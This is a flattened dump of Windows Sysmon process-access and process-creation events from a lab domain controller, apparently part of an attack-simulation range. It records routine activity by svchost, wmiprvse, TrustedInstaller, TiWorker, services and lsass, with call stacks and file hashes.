10:39:59.323{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001091Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.323{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001090Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.323{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001089Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.323{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001088Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.323{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001087Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.307{733EE690-3DFF-5F80-2400-000000007F01}30123032C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{733EE690-3DFF-5F80-2300-000000007F01}2972C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+7d09|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029 10341000x80000000000000001086Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.307{733EE690-3DFF-5F80-2400-000000007F01}30123032C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{733EE690-3DFF-5F80-2300-000000007F01}2972C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+7d09|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029 10341000x80000000000000001085Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.245{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFF-5F80-2400-000000007F01}3012C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001084Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.245{733EE690-3DF7-5F80-0500-000000007F01}6441144C:\Windows\system32\csrss.exe{733EE690-3DFF-5F80-2400-000000007F01}3012C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001083Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.245{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFF-5F80-2400-000000007F01}3012C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001082Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.249{733EE690-3DFF-5F80-2400-000000007F01}3012C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe10.0.14393.3926 (rs1_release.200817-1737)Windows Modules Installer WorkerMicrosoft® Windows® Operating SystemMicrosoft CorporationTiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=A8CBBA3111CF28435F7E8C8B94EC6FBD,SHA256=D4DDF9F7CB94FE55C7EA1CA90AB9638A883B84308C858EF466554E32FB17EFC3,IMPHASH=38FF53C1CCC1EE4C508C0F83A88C4E19{733EE690-3DF9-5F80-0C00-000000007F01}588C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000001081Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.229{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DFF-5F80-2300-000000007F01}2972C:\Windows\servicing\TrustedInstaller.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001080Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.198{733EE690-3DF7-5F80-0A00-000000007F01}852936C:\Windows\system32\services.exe{733EE690-3DFF-5F80-2300-000000007F01}2972C:\Windows\servicing\TrustedInstaller.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001079Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.198{733EE690-3DF7-5F80-0500-000000007F01}6441144C:\Windows\system32\csrss.exe{733EE690-3DFF-5F80-2300-000000007F01}2972C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001078Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.198{733EE690-3DF7-5F80-0A00-000000007F01}8521148C:\Windows\system32\services.exe{733EE690-3DFF-5F80-2300-000000007F01}2972C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001077Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.197{733EE690-3DFF-5F80-2300-000000007F01}2972C:\Windows\servicing\TrustedInstaller.exe10.0.14393.3564 (rs1_release.200303-1942)Windows Modules InstallerMicrosoft® Windows® Operating SystemMicrosoft CorporationTrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=187076E4BC7B2F5FB7D54D1234B3CDEA,SHA256=7AE4CC64E2F0E5C58ABB6542233DA78B9AEAAD22C9D853AB96265EF3FBFEFABE,IMPHASH=648F735E453FC6802BFAECAC5ACA72A4{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001076Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.182{733EE690-3DF7-5F80-0B00-000000007F01}868988C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001075Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.182{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001074Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.182{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001073Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.182{733EE690-3DF7-5F80-0B00-000000007F01}868988C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001072Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.167{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001071Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.167{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001070Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.167{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001069Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.167{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001068Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 